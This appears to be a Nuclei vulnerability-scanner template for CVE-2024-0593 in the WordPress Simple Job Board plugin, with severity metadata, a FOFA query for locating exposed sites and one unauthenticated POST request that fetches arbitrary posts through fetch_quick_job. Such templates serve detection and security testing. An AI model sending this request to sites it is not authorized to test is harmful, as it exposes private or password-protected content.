CVE-2024-0593: WordPress Simple Job Board - Unauthorized Data Access

id: CVE-2024-0593

info:
  name: WordPress Simple Job Board - Unauthorized Data Access
  author: zer0p0int
  severity: medium
  description: |
    The Simple Job Board plugin for WordPress is vulnerable to unauthorized data access due to insufficient authorization checking in the fetch_quick_job() function in all versions up to and including 2.10.8. This makes it possible for unauthenticated attackers to fetch arbitrary posts, which can be password protected or private and contain sensitive information.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/0a28a161-3dbc-4ef0-a2ce-4c102cf3cbb0
    - https://plugins.trac.wordpress.org/changeset/3038476/simple-job-board/trunk/includes/class-simple-job-board-ajax.php
    - https://nvd.nist.gov/vuln/detail/CVE-2024-0593
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-0593
    epss-score: 0.11927
    epss-percentile: 0.9346
    cwe-id: CWE-862
    cpe: cpe:2.3:a:awsm:simple_job_board:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: awsm
    product: simple_job_board
    fofa-query: body="/wp-content/plugins/simple-job-board"
  tags: cve,cve2024,wp,wordpress,wp-plugin,simple-job-board,exposure,vuln

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=fetch_quick_job&job_id=1

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Apply Online"
          - "Submit</button>"
          - "Attach Resume"
          - "Start Company"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022014f524802caf5519f0649599e0298db5b8d5de8df12b5d52d7599e8660bfa0ca022100a9782599e0082e470aefd9fa89cf962bb047d90183e473b434ec168181809bc0:922c64590222798bb761d5b6d8e72950